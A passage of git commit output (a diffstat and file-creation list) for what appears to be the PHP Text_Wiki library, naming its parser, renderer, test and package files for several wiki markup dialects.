 Text/Wiki/Render/Tiki/Subscript.php                |   30 +
 Text/Wiki/Render/Tiki/Superscript.php              |   30 +
 Text/Wiki/Render/Tiki/Table.php                    |   71 +
 Text/Wiki/Render/Tiki/Tighten.php                  |   10 +
 Text/Wiki/Render/Tiki/Toc.php                      |   25 +
 Text/Wiki/Render/Tiki/Tt.php                       |   29 +
 Text/Wiki/Render/Tiki/Underline.php                |   23 +
 Text/Wiki/Render/Tiki/Url.php                      |   40 +
 Text/Wiki/Render/Tiki/Wikilink.php                 |   36 +
 Text/Wiki/Render/Xhtml.php                         |  107 ++
 Text/Wiki/Render/Xhtml/Address.php                 |   54 +
 Text/Wiki/Render/Xhtml/Anchor.php                  |   48 +
 Text/Wiki/Render/Xhtml/Blockquote.php              |   72 +
 Text/Wiki/Render/Xhtml/Bold.php                    |   57 +
 Text/Wiki/Render/Xhtml/Box.php                     |   62 +
 Text/Wiki/Render/Xhtml/Break.php                   |   52 +
 Text/Wiki/Render/Xhtml/Center.php                  |   62 +
 Text/Wiki/Render/Xhtml/Code.php                    |  133 ++
 Text/Wiki/Render/Xhtml/Colortext.php               |   79 +
 Text/Wiki/Render/Xhtml/Deflist.php                 |   87 ++
 Text/Wiki/Render/Xhtml/Delimiter.php               |   46 +
 Text/Wiki/Render/Xhtml/Embed.php                   |   46 +
 Text/Wiki/Render/Xhtml/Emphasis.php                |   58 +
 Text/Wiki/Render/Xhtml/Font.php                    |   83 ++
 Text/Wiki/Render/Xhtml/Freelink.php                |   35 +
 Text/Wiki/Render/Xhtml/Function.php                |  108 ++
 Text/Wiki/Render/Xhtml/Heading.php                 |   88 ++
 Text/Wiki/Render/Xhtml/Horiz.php                   |   51 +
 Text/Wiki/Render/Xhtml/Html.php                    |   47 +
 Text/Wiki/Render/Xhtml/Image.php                   |  184 +++
 Text/Wiki/Render/Xhtml/Include.php                 |   32 +
 Text/Wiki/Render/Xhtml/Interwiki.php               |  103 ++
 Text/Wiki/Render/Xhtml/Italic.php                  |   57 +
 Text/Wiki/Render/Xhtml/List.php                    |  172 +++
 Text/Wiki/Render/Xhtml/Newline.php                 |   35 +
 Text/Wiki/Render/Xhtml/Page.php                    |   46 +
 Text/Wiki/Render/Xhtml/Paragraph.php               |   59 +
 Text/Wiki/Render/Xhtml/Phplookup.php               |   81 +
 Text/Wiki/Render/Xhtml/Plugin.php                  |   47 +
 Text/Wiki/Render/Xhtml/Prefilter.php               |   34 +
 Text/Wiki/Render/Xhtml/Preformatted.php            |   47 +
 Text/Wiki/Render/Xhtml/Raw.php                     |   46 +
 Text/Wiki/Render/Xhtml/Revise.php                  |   68 +
 Text/Wiki/Render/Xhtml/Smiley.php                  |   74 +
 Text/Wiki/Render/Xhtml/Specialchar.php             |   52 +
 Text/Wiki/Render/Xhtml/Strong.php                  |   58 +
 Text/Wiki/Render/Xhtml/Subscript.php               |   57 +
 Text/Wiki/Render/Xhtml/Superscript.php             |   57 +
 Text/Wiki/Render/Xhtml/Table.php                   |  140 ++
 Text/Wiki/Render/Xhtml/Tighten.php                 |   34 +
 Text/Wiki/Render/Xhtml/Titlebar.php                |   57 +
 Text/Wiki/Render/Xhtml/Toc.php                     |  116 ++
 Text/Wiki/Render/Xhtml/Tt.php                      |   58 +
 Text/Wiki/Render/Xhtml/Underline.php               |   57 +
 Text/Wiki/Render/Xhtml/Url.php                     |  131 ++
 Text/Wiki/Render/Xhtml/Wikilink.php                |  177 +++
 Text/Wiki/Tiki.php                                 |   92 ++
 composer.json                                      |   41 +
 doc/BBCodeParser.php                               |  427 ++++++
 doc/BBCodeParser_V2.ini                            |  160 ++
 doc/BBtest.txt                                     |  103 ++
 doc/README_BBCodeParser                            |   45 +
 doc/parser.php                                     |  121 ++
 doc/test_Text_Wiki.php                             |  184 +++
 package.xml                                        |  526 +++++++
 packageBBCode.xml                                  |  146 ++
 packageCowiki.xml                                  |  144 ++
 packageCreole.xml                                  |  132 ++
 packageDoku.xml                                    |  140 ++
 packageMediawiki.xml                               |  160 ++
 packageTiki.xml                                    |  178 +++
 tests/AllTests.php                                 |   41 +
 tests/BBCode/7908.phpt                             |  243 +++
 tests/Cowiki_Render_Url.phpt                       |   18 +
 tests/Creole_Parse_Url.phpt                        |   70 +
 tests/Creole_Render_Url.phpt                       |   18 +
 tests/Default_Parse_BlockQuote.phpt                |   72 +
 tests/Docbook_Render_Url.phpt                      |   14 +
 tests/Doku_Render_Url.phpt                         |   18 +
 tests/Latex_Render_Url.phpt                        |   20 +
 tests/Plain_Render_Url.phpt                        |   15 +
 tests/Text_Wiki_BugTests.php                       |   56 +
 tests/Text_Wiki_Generic_Transform_Tests.php        |   36 +
 tests/Text_Wiki_Parse_Mediawiki_Tests.php          |  765 ++++++++++
 tests/Text_Wiki_Parse_Tiki_Tests.php               |  127 ++
 tests/Text_Wiki_Render_Tests.php                   |   98 ++
 tests/Text_Wiki_Render_Tiki_Tests.php              |  728 +++++++++
 tests/Text_Wiki_Tests.php                          |  505 +++++++
 tests/Xhtml_Render_Url.phpt                        |   15 +
 tests/fixtures/bug11649.txt                        |  521 +++++++
 tests/fixtures/mediawiki_syntax.txt                |  123 ++
 .../mediawiki_syntax_to_test_preformatted.txt      |   10 +
 tests/fixtures/mediawiki_syntax_to_test_raw.txt    |    9 +
 .../fixtures/mediawiki_syntax_to_test_wikilink.txt |   88 ++
 .../test_mediawiki_to_tiki_lists_output.txt        |   17 +
 .../test_mediawiki_to_tiki_lists_source.txt        |   18 +
 tests/fixtures/test_mediawiki_to_tiki_output.txt   |   52 +
 .../test_mediawiki_to_tiki_redirect_output.txt     |    3 +
 .../test_mediawiki_to_tiki_redirect_source.txt     |    2 +
 tests/fixtures/test_mediawiki_to_tiki_source.txt   |   58 +
 .../test_mediawiki_wikilink_expected_matches.php   |   70 +
 .../test_tiki_heading_expected_matches.php         |   60 +
 .../fixtures/test_tiki_to_tiki_heading_source.txt  |   11 +
 .../fixtures/text_wiki_sample_mediawiki_syntax.txt |   66 +
 ...ext_wiki_sample_syntax_transformed_to_plain.txt |   64 +
 ...xt_wiki_sample_syntax_transformed_to_plain2.txt |   64 +
 ...ext_wiki_sample_syntax_transformed_to_xhtml.txt |   70 +
 tests/fixtures/tiki_syntax.txt                     |   23 +
 621 files changed, 47292 insertions(+)
 create mode 100644 .gitignore
 create mode 100644 .travis.yml
 create mode 100644 Text/Wiki.php
 create mode 100644 Text/Wiki/BBCode.php
 create mode 100644 Text/Wiki/Cowiki.php
 create mode 100644 Text/Wiki/Creole.php
 create mode 100644 Text/Wiki/Default.php
 create mode 100644 Text/Wiki/Doku.php
 create mode 100644 Text/Wiki/Mediawiki.php
 create mode 100644 Text/Wiki/Parse.php
 create mode 100644 Text/Wiki/Parse/BBCode/Blockquote.php
 create mode 100644 Text/Wiki/Parse/BBCode/Bold.php
 create mode 100644 Text/Wiki/Parse/BBCode/Code.php
 create mode 100755 Text/Wiki/Parse/BBCode/Colortext.php
 create mode 100644 Text/Wiki/Parse/BBCode/Font.php
 create mode 100644 Text/Wiki/Parse/BBCode/Image.php
 create mode 100644 Text/Wiki/Parse/BBCode/Italic.php
 create mode 100644 Text/Wiki/Parse/BBCode/List.php
 create mode 100644 Text/Wiki/Parse/BBCode/Subscript.php
 create mode 100644 Text/Wiki/Parse/BBCode/Superscript.php
 create mode 100644 Text/Wiki/Parse/BBCode/Underline.php
 create mode 100644 Text/Wiki/Parse/BBCode/Url.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Anchor.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Blockquote.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Bold.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Break.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Center.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Code.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Colortext.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Deflist.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Delimiter.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Embed.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Emphasis.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Freelink.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Function.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Heading.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Horiz.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Html.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Image.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Include.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Interwiki.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Italic.php
 create mode 100644 Text/Wiki/Parse/Cowiki/List.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Newline.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Paragraph.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Phplookup.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Prefilter.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Raw.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Revise.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Strong.php
 create mode 100755 Text/Wiki/Parse/Cowiki/Subscript.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Superscript.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Table.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Tighten.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Toc.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Tt.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Underline.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Url.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Wikilink.php
 create mode 100644 Text/Wiki/Parse/Creole/Address.php
 create mode 100644 Text/Wiki/Parse/Creole/Blockquote.php
 create mode 100644 Text/Wiki/Parse/Creole/Bold.php
 create mode 100644 Text/Wiki/Parse/Creole/Box.php
 create mode 100644 Text/Wiki/Parse/Creole/Break.php
 create mode 100644 Text/Wiki/Parse/Creole/Center.php
 create mode 100644 Text/Wiki/Parse/Creole/Deflist.php
 create mode 100644 Text/Wiki/Parse/Creole/Delimiter.php
 create mode 100644 Text/Wiki/Parse/Creole/Emphasis.php
 create mode 100644 Text/Wiki/Parse/Creole/Footnote.php
 create mode 100644 Text/Wiki/Parse/Creole/Heading.php
 create mode 100644 Text/Wiki/Parse/Creole/Horiz.php
 create mode 100644 Text/Wiki/Parse/Creole/Image.php
 create mode 100644 Text/Wiki/Parse/Creole/Italic.php
 create mode 100644 Text/Wiki/Parse/Creole/List.php
 create mode 100644 Text/Wiki/Parse/Creole/Newline.php
 create mode 100644 Text/Wiki/Parse/Creole/Paragraph.php
 create mode 100644 Text/Wiki/Parse/Creole/Prefilter.php
 create mode 100644 Text/Wiki/Parse/Creole/Preformatted.php
 create mode 100644 Text/Wiki/Parse/Creole/Raw.php
 create mode 100644 Text/Wiki/Parse/Creole/Strong.php
 create mode 100644 Text/Wiki/Parse/Creole/Subscript.php
 create mode 100644 Text/Wiki/Parse/Creole/Superscript.php
 create mode 100644 Text/Wiki/Parse/Creole/Table.php
 create mode 100644 Text/Wiki/Parse/Creole/Tighten.php
 create mode 100644 Text/Wiki/Parse/Creole/Trim.php
 create mode 100644 Text/Wiki/Parse/Creole/Tt.php
 create mode 100644 Text/Wiki/Parse/Creole/Underline.php
 create mode 100644 Text/Wiki/Parse/Creole/Url.php
 create mode 100644 Text/Wiki/Parse/Creole/Wikilink.php
 create mode 100644 Text/Wiki/Parse/Default/Anchor.php
 create mode 100644 Text/Wiki/Parse/Default/Blockquote.php
 create mode 100644 Text/Wiki/Parse/Default/Bold.php
 create mode 100644 Text/Wiki/Parse/Default/Break.php
 create mode 100644 Text/Wiki/Parse/Default/Center.php
 create mode 100644 Text/Wiki/Parse/Default/Code.php
 create mode 100644 Text/Wiki/Parse/Default/Colortext.php
 create mode 100644 Text/Wiki/Parse/Default/Deflist.php
 create mode 100644 Text/Wiki/Parse/Default/Delimiter.php
 create mode 100644 Text/Wiki/Parse/Default/Embed.php
 create mode 100644 Text/Wiki/Parse/Default/Emphasis.php
 create mode 100644 Text/Wiki/Parse/Default/Freelink.php
 create mode 100644 Text/Wiki/Parse/Default/Function.php
 create mode 100644 Text/Wiki/Parse/Default/Heading.php
 create mode 100644 Text/Wiki/Parse/Default/Horiz.php
 create mode 100644 Text/Wiki/Parse/Default/Html.php
 create mode 100644 Text/Wiki/Parse/Default/Image.php
 create mode 100644 Text/Wiki/Parse/Default/Include.php
 create mode 100644 Text/Wiki/Parse/Default/Interwiki.php
 create mode 100644 Text/Wiki/Parse/Default/Italic.php
 create mode 100644 Text/Wiki/Parse/Default/List.php
 create mode 100644 Text/Wiki/Parse/Default/Newline.php
 create mode 100644 Text/Wiki/Parse/Default/Paragraph.php
 create mode 100644 Text/Wiki/Parse/Default/Phplookup.php
 create mode 100644 Text/Wiki/Parse/Default/Prefilter.php
 create mode 100644 Text/Wiki/Parse/Default/Raw.php
 create mode 100644 Text/Wiki/Parse/Default/Revise.php
 create mode 100644 Text/Wiki/Parse/Default/Smiley.php
 create mode 100644 Text/Wiki/Parse/Default/Strong.php
 create mode 100644 Text/Wiki/Parse/Default/Subscript.php
 create mode 100644 Text/Wiki/Parse/Default/Superscript.php
 create mode 100644 Text/Wiki/Parse/Default/Table.php
 create mode 100644 Text/Wiki/Parse/Default/Tighten.php
 create mode 100644 Text/Wiki/Parse/Default/Toc.php
 create mode 100644 Text/Wiki/Parse/Default/Tt.php
 create mode 100644 Text/Wiki/Parse/Default/Underline.php
 create mode 100644 Text/Wiki/Parse/Default/Url.php
 create mode 100644 Text/Wiki/Parse/Default/Wikilink.php
 create mode 100644 Text/Wiki/Parse/Doku/Anchor.php
 create mode 100644 Text/Wiki/Parse/Doku/Blockquote.php
 create mode 100644 Text/Wiki/Parse/Doku/Bold.php
 create mode 100644 Text/Wiki/Parse/Doku/Break.php
 create mode 100644 Text/Wiki/Parse/Doku/Center.php
 create mode 100644 Text/Wiki/Parse/Doku/Code.php
 create mode 100644 Text/Wiki/Parse/Doku/Colortext.php
 create mode 100644 Text/Wiki/Parse/Doku/Deflist.php
 create mode 100644 Text/Wiki/Parse/Doku/Delimiter.php
 create mode 100644 Text/Wiki/Parse/Doku/Embed.php
 create mode 100644 Text/Wiki/Parse/Doku/Emphasis.php
 create mode 100644 Text/Wiki/Parse/Doku/Freelink.php
 create mode 100644 Text/Wiki/Parse/Doku/Function.php
 create mode 100644 Text/Wiki/Parse/Doku/Heading.php
 create mode 100644 Text/Wiki/Parse/Doku/Horiz.php
 create mode 100644 Text/Wiki/Parse/Doku/Html.php
 create mode 100644 Text/Wiki/Parse/Doku/Image.php
 create mode 100644 Text/Wiki/Parse/Doku/Include.php
 create mode 100644 Text/Wiki/Parse/Doku/Interwiki.php
 create mode 100644 Text/Wiki/Parse/Doku/Italic.php
 create mode 100644 Text/Wiki/Parse/Doku/List.php
 create mode 100644 Text/Wiki/Parse/Doku/Newline.php
 create mode 100644 Text/Wiki/Parse/Doku/Paragraph.php
 create mode 100644 Text/Wiki/Parse/Doku/Phplookup.php
 create mode 100644 Text/Wiki/Parse/Doku/Prefilter.php
 create mode 100644 Text/Wiki/Parse/Doku/Raw.php
 create mode 100644 Text/Wiki/Parse/Doku/Revise.php
 create mode 100644 Text/Wiki/Parse/Doku/Strong.php
 create mode 100755 Text/Wiki/Parse/Doku/Subscript.php
 create mode 100644 Text/Wiki/Parse/Doku/Superscript.php
 create mode 100644 Text/Wiki/Parse/Doku/Table.php
 create mode 100644 Text/Wiki/Parse/Doku/Tighten.php
 create mode 100644 Text/Wiki/Parse/Doku/Toc.php
 create mode 100644 Text/Wiki/Parse/Doku/Tt.php
 create mode 100644 Text/Wiki/Parse/Doku/Underline.php
 create mode 100644 Text/Wiki/Parse/Doku/Url.php
 create mode 100644 Text/Wiki/Parse/Doku/Wikilink.php
 create mode 100755 Text/Wiki/Parse/Mediawiki/Break.php
 create mode 100755 Text/Wiki/Parse/Mediawiki/Code.php
 create mode 100755 Text/Wiki/Parse/Mediawiki/Comment.php
 create mode 100755 Text/Wiki/Parse/Mediawiki/Deflist.php
 create mode 100644 Text/Wiki/Parse/Mediawiki/Emphasis.php
 create mode 100644 Text/Wiki/Parse/Mediawiki/Heading.php
 create mode 100755 Text/Wiki/Parse/Mediawiki/List.php
 create mode 100755 Text/Wiki/Parse/Mediawiki/Newline.php
 create mode 100755 Text/Wiki/Parse/Mediawiki/Preformatted.php
 create mode 100644 Text/Wiki/Parse/Mediawiki/Raw.php
 create mode 100644 Text/Wiki/Parse/Mediawiki/Redirect.php
 create mode 100755 Text/Wiki/Parse/Mediawiki/Subscript.php
 create mode 100755 Text/Wiki/Parse/Mediawiki/Superscript.php
 create mode 100644 Text/Wiki/Parse/Mediawiki/Table.php
 create mode 100755 Text/Wiki/Parse/Mediawiki/Tt.php
 create mode 100644 Text/Wiki/Parse/Mediawiki/Url.php
 create mode 100644 Text/Wiki/Parse/Mediawiki/Wikilink.php
 create mode 100755 Text/Wiki/Parse/Tiki/Anchor.php
 create mode 100755 Text/Wiki/Parse/Tiki/Blockquote.php
 create mode 100755 Text/Wiki/Parse/Tiki/Bold.php
 create mode 100755 Text/Wiki/Parse/Tiki/Box.php
 create mode 100755 Text/Wiki/Parse/Tiki/Break.php
 create mode 100755 Text/Wiki/Parse/Tiki/Center.php
 create mode 100755 Text/Wiki/Parse/Tiki/Code.php
 create mode 100755 Text/Wiki/Parse/Tiki/Colortext.php
 create mode 100755 Text/Wiki/Parse/Tiki/Deflist.php
 create mode 100755 Text/Wiki/Parse/Tiki/Delimiter.php
 create mode 100755 Text/Wiki/Parse/Tiki/Embed.php
 create mode 100755 Text/Wiki/Parse/Tiki/Emphasis.php
 create mode 100755 Text/Wiki/Parse/Tiki/Freelink.php
 create mode 100755 Text/Wiki/Parse/Tiki/Heading.php
 create mode 100755 Text/Wiki/Parse/Tiki/Horiz.php
 create mode 100755 Text/Wiki/Parse/Tiki/Html.php
 create mode 100755 Text/Wiki/Parse/Tiki/Image.php
 create mode 100755 Text/Wiki/Parse/Tiki/Include.php
 create mode 100755 Text/Wiki/Parse/Tiki/Interwiki.php
 create mode 100755 Text/Wiki/Parse/Tiki/Italic.php
 create mode 100755 Text/Wiki/Parse/Tiki/List.php
 create mode 100755 Text/Wiki/Parse/Tiki/Newline.php
 create mode 100644 Text/Wiki/Parse/Tiki/Page.php
 create mode 100755 Text/Wiki/Parse/Tiki/Paragraph.php
 create mode 100644 Text/Wiki/Parse/Tiki/Plugin.php
 create mode 100755 Text/Wiki/Parse/Tiki/Prefilter.php
 create mode 100755 Text/Wiki/Parse/Tiki/Preformatted.php
 create mode 100755 Text/Wiki/Parse/Tiki/Raw.php
 create mode 100755 Text/Wiki/Parse/Tiki/Revise.php
 create mode 100644 Text/Wiki/Parse/Tiki/Smiley.php
 create mode 100644 Text/Wiki/Parse/Tiki/Specialchar.php
 create mode 100755 Text/Wiki/Parse/Tiki/Strong.php
 create mode 100755 Text/Wiki/Parse/Tiki/Subscript.php
 create mode 100755 Text/Wiki/Parse/Tiki/Superscript.php
 create mode 100755 Text/Wiki/Parse/Tiki/Table.php
 create mode 100755 Text/Wiki/Parse/Tiki/Tighten.php
 create mode 100644 Text/Wiki/Parse/Tiki/Titlebar.php
 create mode 100755 Text/Wiki/Parse/Tiki/Toc.php
 create mode 100755 Text/Wiki/Parse/Tiki/Tt.php
 create mode 100755 Text/Wiki/Parse/Tiki/Underline.php
 create mode 100755 Text/Wiki/Parse/Tiki/Url.php
 create mode 100755 Text/Wiki/Parse/Tiki/Wikilink.php
 create mode 100644 Text/Wiki/Render.php
 create mode 100644 Text/Wiki/Render/Cowiki.php
 create mode 100644 Text/Wiki/Render/Cowiki/Anchor.php
 create mode 100644 Text/Wiki/Render/Cowiki/Blockquote.php
 create mode 100644 Text/Wiki/Render/Cowiki/Bold.php
 create mode 100644 Text/Wiki/Render/Cowiki/Box.php
 create mode 100644 Text/Wiki/Render/Cowiki/Break.php
 create mode 100644 Text/Wiki/Render/Cowiki/Center.php
 create mode 100644 Text/Wiki/Render/Cowiki/Code.php
 create mode 100644 Text/Wiki/Render/Cowiki/Colortext.php
 create mode 100644 Text/Wiki/Render/Cowiki/Deflist.php
 create mode 100644 Text/Wiki/Render/Cowiki/Delimiter.php
 create mode 100644 Text/Wiki/Render/Cowiki/Embed.php
 create mode 100644 Text/Wiki/Render/Cowiki/Emphasis.php
 create mode 100644 Text/Wiki/Render/Cowiki/Freelink.php
 create mode 100644 Text/Wiki/Render/Cowiki/Function.php
 create mode 100644 Text/Wiki/Render/Cowiki/Heading.php
 create mode 100644 Text/Wiki/Render/Cowiki/Horiz.php
 create mode 100644 Text/Wiki/Render/Cowiki/Html.php
 create mode 100644 Text/Wiki/Render/Cowiki/Image.php
 create mode 100644 Text/Wiki/Render/Cowiki/Include.php
 create mode 100644 Text/Wiki/Render/Cowiki/Interwiki.php
 create mode 100644 Text/Wiki/Render/Cowiki/Italic.php
 create mode 100644 Text/Wiki/Render/Cowiki/List.php
 create mode 100644 Text/Wiki/Render/Cowiki/Newline.php
 create mode 100644 Text/Wiki/Render/Cowiki/Paragraph.php
 create mode 100644 Text/Wiki/Render/Cowiki/Phplookup.php
 create mode 100644 Text/Wiki/Render/Cowiki/Prefilter.php
 create mode 100644 Text/Wiki/Render/Cowiki/Raw.php
 create mode 100644 Text/Wiki/Render/Cowiki/Revise.php
 create mode 100644 Text/Wiki/Render/Cowiki/Strong.php
 create mode 100755 Text/Wiki/Render/Cowiki/Subscript.php
 create mode 100644 Text/Wiki/Render/Cowiki/Superscript.php
 create mode 100644 Text/Wiki/Render/Cowiki/Table.php
 create mode 100644 Text/Wiki/Render/Cowiki/Tighten.php
 create mode 100644 Text/Wiki/Render/Cowiki/Toc.php
 create mode 100644 Text/Wiki/Render/Cowiki/Tt.php
 create mode 100644 Text/Wiki/Render/Cowiki/Underline.php
 create mode 100644 Text/Wiki/Render/Cowiki/Url.php
 create mode 100644 Text/Wiki/Render/Cowiki/Wikilink.php
 create mode 100644 Text/Wiki/Render/Creole.php
 create mode 100644 Text/Wiki/Render/Creole/Address.php
 create mode 100644 Text/Wiki/Render/Creole/Anchor.php
 create mode 100644 Text/Wiki/Render/Creole/Blockquote.php
 create mode 100644 Text/Wiki/Render/Creole/Bold.php
 create mode 100644 Text/Wiki/Render/Creole/Box.php
 create mode 100644 Text/Wiki/Render/Creole/Break.php
 create mode 100644 Text/Wiki/Render/Creole/Center.php
 create mode 100644 Text/Wiki/Render/Creole/Code.php
 create mode 100644 Text/Wiki/Render/Creole/Colortext.php
 create mode 100644 Text/Wiki/Render/Creole/Deflist.php
 create mode 100644 Text/Wiki/Render/Creole/Delimiter.php
 create mode 100644 Text/Wiki/Render/Creole/Embed.php
 create mode 100644 Text/Wiki/Render/Creole/Emphasis.php
 create mode 100644 Text/Wiki/Render/Creole/Freelink.php
 create mode 100644 Text/Wiki/Render/Creole/Function.php
 create mode 100644 Text/Wiki/Render/Creole/Heading.php
 create mode 100644 Text/Wiki/Render/Creole/Horiz.php
 create mode 100644 Text/Wiki/Render/Creole/Html.php
 create mode 100644 Text/Wiki/Render/Creole/Image.php
 create mode 100644 Text/Wiki/Render/Creole/Include.php
 create mode 100644 Text/Wiki/Render/Creole/Interwiki.php
 create mode 100644 Text/Wiki/Render/Creole/Italic.php
 create mode 100644 Text/Wiki/Render/Creole/List.php
 create mode 100644 Text/Wiki/Render/Creole/Newline.php
 create mode 100644 Text/Wiki/Render/Creole/Paragraph.php
 create mode 100644 Text/Wiki/Render/Creole/Phplookup.php
 create mode 100644 Text/Wiki/Render/Creole/Prefilter.php
 create mode 100644 Text/Wiki/Render/Creole/Preformatted.php
 create mode 100644 Text/Wiki/Render/Creole/Raw.php
 create mode 100644 Text/Wiki/Render/Creole/Revise.php
 create mode 100644 Text/Wiki/Render/Creole/Strong.php
 create mode 100644 Text/Wiki/Render/Creole/Subscript.php
 create mode 100644 Text/Wiki/Render/Creole/Superscript.php
 create mode 100644 Text/Wiki/Render/Creole/Table.php
 create mode 100644 Text/Wiki/Render/Creole/Tighten.php
 create mode 100644 Text/Wiki/Render/Creole/Toc.php
 create mode 100644 Text/Wiki/Render/Creole/Tt.php
 create mode 100644 Text/Wiki/Render/Creole/Underline.php
 create mode 100644 Text/Wiki/Render/Creole/Url.php
 create mode 100644 Text/Wiki/Render/Creole/Wikilink.php
 create mode 100644 Text/Wiki/Render/Docbook.php
 create mode 100644 Text/Wiki/Render/Docbook/Anchor.php
 create mode 100644 Text/Wiki/Render/Docbook/Blockquote.php
 create mode 100644 Text/Wiki/Render/Docbook/Bold.php
 create mode 100644 Text/Wiki/Render/Docbook/Box.php
 create mode 100644 Text/Wiki/Render/Docbook/Break.php
 create mode 100644 Text/Wiki/Render/Docbook/Center.php
 create mode 100644 Text/Wiki/Render/Docbook/Code.php
 create mode 100644 Text/Wiki/Render/Docbook/Colortext.php
 create mode 100644 Text/Wiki/Render/Docbook/Deflist.php
 create mode 100644 Text/Wiki/Render/Docbook/Delimiter.php
 create mode 100644 Text/Wiki/Render/Docbook/Embed.php
 create mode 100644 Text/Wiki/Render/Docbook/Emphasis.php
 create mode 100644 Text/Wiki/Render/Docbook/Font.php
 create mode 100644 Text/Wiki/Render/Docbook/Freelink.php
 create mode 100644 Text/Wiki/Render/Docbook/Function.php
 create mode 100644 Text/Wiki/Render/Docbook/Heading.php
 create mode 100644 Text/Wiki/Render/Docbook/Horiz.php
 create mode 100644 Text/Wiki/Render/Docbook/Html.php
 create mode 100644 Text/Wiki/Render/Docbook/Image.php
 create mode 100644 Text/Wiki/Render/Docbook/Include.php
 create mode 100644 Text/Wiki/Render/Docbook/Interwiki.php
 create mode 100644 Text/Wiki/Render/Docbook/Italic.php
 create mode 100644 Text/Wiki/Render/Docbook/List.php
 create mode 100644 Text/Wiki/Render/Docbook/Newline.php
 create mode 100644 Text/Wiki/Render/Docbook/Page.php
 create mode 100644 Text/Wiki/Render/Docbook/Paragraph.php
 create mode 100644 Text/Wiki/Render/Docbook/Phplookup.php
 create mode 100644 Text/Wiki/Render/Docbook/Plugin.php
 create mode 100644 Text/Wiki/Render/Docbook/Prefilter.php
 create mode 100644 Text/Wiki/Render/Docbook/Preformatted.php
 create mode 100644 Text/Wiki/Render/Docbook/Raw.php
 create mode 100644 Text/Wiki/Render/Docbook/Revise.php
 create mode 100644 Text/Wiki/Render/Docbook/Smiley.php
 create mode 100644 Text/Wiki/Render/Docbook/Specialchar.php
 create mode 100644 Text/Wiki/Render/Docbook/Strong.php
 create mode 100644 Text/Wiki/Render/Docbook/Subscript.php
 create mode 100644 Text/Wiki/Render/Docbook/Superscript.php
 create mode 100644 Text/Wiki/Render/Docbook/Table.php
 create mode 100644 Text/Wiki/Render/Docbook/Tighten.php
 create mode 100644 Text/Wiki/Render/Docbook/Titlebar.php
 create mode 100644 Text/Wiki/Render/Docbook/Toc.php
 create mode 100644 Text/Wiki/Render/Docbook/Tt.php
 create mode 100644 Text/Wiki/Render/Docbook/Underline.php
 create mode 100644 Text/Wiki/Render/Docbook/Url.php
 create mode 100644 Text/Wiki/Render/Docbook/Wikilink.php
 create mode 100644 Text/Wiki/Render/Doku.php
 create mode 100644 Text/Wiki/Render/Doku/Anchor.php
 create mode 100644 Text/Wiki/Render/Doku/Blockquote.php
 create mode 100644 Text/Wiki/Render/Doku/Bold.php
 create mode 100644 Text/Wiki/Render/Doku/Box.php
 create mode 100644 Text/Wiki/Render/Doku/Break.php
 create mode 100644 Text/Wiki/Render/Doku/Center.php
 create mode 100644 Text/Wiki/Render/Doku/Code.php
 create mode 100644 Text/Wiki/Render/Doku/Colortext.php
 create mode 100644 Text/Wiki/Render/Doku/Deflist.php
 create mode 100644 Text/Wiki/Render/Doku/Delimiter.php
 create mode 100644 Text/Wiki/Render/Doku/Embed.php
 create mode 100644 Text/Wiki/Render/Doku/Emphasis.php
 create mode 100644 Text/Wiki/Render/Doku/Freelink.php
 create mode 100644 Text/Wiki/Render/Doku/Function.php
 create mode 100644 Text/Wiki/Render/Doku/Heading.php
 create mode 100644 Text/Wiki/Render/Doku/Horiz.php
 create mode 100644 Text/Wiki/Render/Doku/Html.php
 create mode 100644 Text/Wiki/Render/Doku/Image.php
 create mode 100644 Text/Wiki/Render/Doku/Include.php
 create mode 100644 Text/Wiki/Render/Doku/Interwiki.php
 create mode 100644 Text/Wiki/Render/Doku/Italic.php
 create mode 100644 Text/Wiki/Render/Doku/List.php
 create mode 100644 Text/Wiki/Render/Doku/Newline.php
 create mode 100644 Text/Wiki/Render/Doku/Paragraph.php
 create mode 100644 Text/Wiki/Render/Doku/Phplookup.php
 create mode 100644 Text/Wiki/Render/Doku/Prefilter.php
 create mode 100644 Text/Wiki/Render/Doku/Raw.php
 create mode 100644 Text/Wiki/Render/Doku/Revise.php
 create mode 100644 Text/Wiki/Render/Doku/Strong.php
 create mode 100755 Text/Wiki/Render/Doku/Subscript.php
 create mode 100644 Text/Wiki/Render/Doku/Superscript.php
 create mode 100644 Text/Wiki/Render/Doku/Table.php
 create mode 100644 Text/Wiki/Render/Doku/Tighten.php
 create mode 100644 Text/Wiki/Render/Doku/Toc.php
 create mode 100644 Text/Wiki/Render/Doku/Tt.php
 create mode 100644 Text/Wiki/Render/Doku/Underline.php
 create mode 100644 Text/Wiki/Render/Doku/Url.php
 create mode 100644 Text/Wiki/Render/Doku/Wikilink.php
 create mode 100644 Text/Wiki/Render/Latex.php
